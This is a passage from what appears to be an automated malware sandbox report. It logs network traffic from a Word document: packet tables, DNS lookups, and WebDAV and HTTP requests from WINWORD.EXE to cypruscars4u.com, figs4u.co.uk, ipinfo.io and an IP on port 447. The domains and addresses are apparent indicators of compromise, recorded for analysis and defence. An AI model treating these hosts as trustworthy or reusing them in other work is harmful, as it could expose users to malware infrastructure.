                Mai 25, 2018 16:10:03.371674061 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371742010 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371743917 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.371754885 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371769905 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371845007 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371855021 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.371965885 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.372006893 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.372512102 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.372531891 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.372595072 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.372616053 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.374778032 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.417319059 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417339087 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417346001 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417357922 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417368889 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417450905 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417459011 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.417465925 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.418626070 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.418657064 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419294119 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419313908 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419323921 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419429064 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419436932 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419446945 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419454098 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419461966 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.419627905 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421231985 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.421276093 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421291113 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421298981 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421305895 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421314001 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.421345949 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.424896002 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.424956083 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.429785013 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.429802895 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.430563927 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.430609941 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.432471991 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.432487965 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.435178041 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.435229063 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.468894005 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.468916893 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.468928099 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.468936920 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.468945026 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.469042063 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.469039917 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.469054937 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.469067097 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.470278025 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.471843958 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.471860886 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.471868992 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.471986055 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.472009897 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481590986 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481627941 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481640100 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481647968 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481656075 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481750011 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481765032 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.481867075 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.481898069 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483587027 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483608007 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483618975 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483690023 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.483710051 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483755112 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.483766079 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.484101057 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.484119892 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.484249115 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.485115051 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.485136986 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529165030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529200077 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529215097 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529232025 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529242992 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529422045 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.529433966 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529462099 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529479980 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529501915 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529508114 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.529515028 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529606104 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529613018 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.529623032 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529640913 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529653072 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529701948 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.529819965 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529836893 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529851913 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529866934 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529877901 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529896975 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.529913902 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529968023 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.529983044 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.530031919 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.530047894 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.530797958 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.531811953 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.531836033 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.532741070 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.532766104 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.541400909 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.541438103 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.541718006 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.541764975 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.544377089 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.544550896 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.544596910 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.575855970 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.576136112 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.576164961 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.593895912 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.593928099 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.593939066 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.593946934 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.593955040 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594080925 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594094038 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594105005 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594113111 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594157934 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.594187975 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594240904 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594254017 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594264030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594271898 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594279051 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594366074 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.594399929 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594413996 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.594424009 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.595118999 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.596628904 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.596647024 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.596656084 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.599205017 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.599240065 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.725277901 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.725513935 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:10:03.725583076 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:10:03.923336983 MESZ49197447192.168.1.1682.202.221.37

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Mai 25, 2018 16:04:03.729567051 MESZ5697553192.168.1.168.8.8.8
                Mai 25, 2018 16:04:04.004415035 MESZ53569758.8.8.8192.168.1.16
                Mai 25, 2018 16:04:04.917773008 MESZ5120853192.168.1.168.8.8.8
                Mai 25, 2018 16:04:05.048067093 MESZ53512088.8.8.8192.168.1.16
                Mai 25, 2018 16:04:05.056689978 MESZ6222853192.168.1.168.8.8.8
                Mai 25, 2018 16:04:05.186736107 MESZ53622288.8.8.8192.168.1.16
                Mai 25, 2018 16:04:14.249743938 MESZ5865953192.168.1.168.8.8.8
                Mai 25, 2018 16:04:14.400018930 MESZ53586598.8.8.8192.168.1.16
                Mai 25, 2018 16:04:14.404015064 MESZ5691753192.168.1.168.8.8.8
                Mai 25, 2018 16:04:14.562123060 MESZ53569178.8.8.8192.168.1.16
                Mai 25, 2018 16:05:02.503922939 MESZ6497053192.168.1.168.8.8.8
                Mai 25, 2018 16:05:02.820489883 MESZ53649708.8.8.8192.168.1.16
                Mai 25, 2018 16:06:13.921541929 MESZ5461853192.168.1.168.8.8.8
                Mai 25, 2018 16:06:14.069631100 MESZ53546188.8.8.8192.168.1.16
                Mai 25, 2018 16:06:14.071876049 MESZ6239653192.168.1.168.8.8.8
                Mai 25, 2018 16:06:14.214643955 MESZ53623968.8.8.8192.168.1.16
                Mai 25, 2018 16:09:08.120750904 MESZ6363853192.168.1.168.8.8.8
                Mai 25, 2018 16:09:08.860121012 MESZ53636388.8.8.8192.168.1.16
                Mai 25, 2018 16:09:08.884736061 MESZ5287753192.168.1.168.8.8.8
                Mai 25, 2018 16:09:09.165577888 MESZ53528778.8.8.8192.168.1.16
                Mai 25, 2018 16:09:15.084429026 MESZ5936253192.168.1.168.8.8.8
                Mai 25, 2018 16:09:15.469989061 MESZ53593628.8.8.8192.168.1.16
                Mai 25, 2018 16:09:15.485255003 MESZ5226153192.168.1.168.8.8.8
                Mai 25, 2018 16:09:15.771600008 MESZ53522618.8.8.8192.168.1.16

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Mai 25, 2018 16:04:03.729567051 MESZ192.168.1.168.8.8.80xca40Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:04:04.917773008 MESZ192.168.1.168.8.8.80xdd3dStandard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:04:05.056689978 MESZ192.168.1.168.8.8.80xb529Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:04:14.249743938 MESZ192.168.1.168.8.8.80xf6b6Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:04:14.404015064 MESZ192.168.1.168.8.8.80xa1c9Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:05:02.503922939 MESZ192.168.1.168.8.8.80xd203Standard query (0)figs4u.co.ukA (IP address)IN (0x0001)
                Mai 25, 2018 16:06:13.921541929 MESZ192.168.1.168.8.8.80xe3c1Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:06:14.071876049 MESZ192.168.1.168.8.8.80x3469Standard query (0)cypruscars4u.comA (IP address)IN (0x0001)
                Mai 25, 2018 16:09:08.120750904 MESZ192.168.1.168.8.8.80xa9ffStandard query (0)ipinfo.ioA (IP address)IN (0x0001)
                Mai 25, 2018 16:09:08.884736061 MESZ192.168.1.168.8.8.80xe817Standard query (0)ipinfo.ioA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
                Mai 25, 2018 16:04:04.004415035 MESZ8.8.8.8192.168.1.160xca40No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:04:05.048067093 MESZ8.8.8.8192.168.1.160xdd3dNo error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:04:05.186736107 MESZ8.8.8.8192.168.1.160xb529No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:04:14.400018930 MESZ8.8.8.8192.168.1.160xf6b6No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:04:14.562123060 MESZ8.8.8.8192.168.1.160xa1c9No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:05:02.820489883 MESZ8.8.8.8192.168.1.160xd203No error (0)figs4u.co.uk87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:06:14.069631100 MESZ8.8.8.8192.168.1.160xe3c1No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:06:14.214643955 MESZ8.8.8.8192.168.1.160x3469No error (0)cypruscars4u.com87.247.241.143A (IP address)IN (0x0001)
                Mai 25, 2018 16:09:08.860121012 MESZ8.8.8.8192.168.1.160xa9ffNo error (0)ipinfo.io216.239.34.21A (IP address)IN (0x0001)
                Mai 25, 2018 16:09:09.165577888 MESZ8.8.8.8192.168.1.160xe817No error (0)ipinfo.io216.239.34.21A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • cypruscars4u.com
                • figs4u.co.uk
                • ipinfo.io

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.1.164918887.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:04:04.095504999 MESZ0OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: cypruscars4u.com
                Content-Length: 0
                Connection: Keep-Alive
                Mai 25, 2018 16:04:04.198158979 MESZ1INHTTP/1.1 302 Found
                Date: Fri, 25 May 2018 14:04:04 GMT
                Server: Apache
                Location: http://cypruscars4u.com/wordpress
                Content-Length: 217
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.1.164918987.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:04:05.189836979 MESZ1OUTHEAD /logo.jpg HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft Office Existence Discovery
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:05.301259041 MESZ2INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:04:05 GMT
                Server: Apache
                Last-Modified: Fri, 25 May 2018 10:39:39 GMT
                Accept-Ranges: bytes
                Content-Length: 55287
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg
                Mai 25, 2018 16:04:05.503052950 MESZ2INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:04:05 GMT
                Server: Apache
                Last-Modified: Fri, 25 May 2018 10:39:39 GMT
                Accept-Ranges: bytes
                Content-Length: 55287
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.1.164919087.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:04:14.563160896 MESZ3OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:14.686031103 MESZ4INHTTP/1.1 302 Found
                Date: Fri, 25 May 2018 14:04:14 GMT
                Server: Apache
                Location: http://cypruscars4u.com/wordpress
                Content-Length: 217
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>
                Mai 25, 2018 16:04:14.687855959 MESZ4OUTOPTIONS /wordpress HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:14.754057884 MESZ4INHTTP/1.1 301 Moved Permanently
                Date: Fri, 25 May 2018 14:04:14 GMT
                Server: Apache
                Location: http://cypruscars4u.com/wordpress/
                Content-Length: 242
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress/">here</a>.</p></body></html>
                Mai 25, 2018 16:04:14.758125067 MESZ5OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:14.821834087 MESZ5INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:04:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=98
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:04:14.823277950 MESZ5OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:14.905404091 MESZ6INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:04:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=97
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
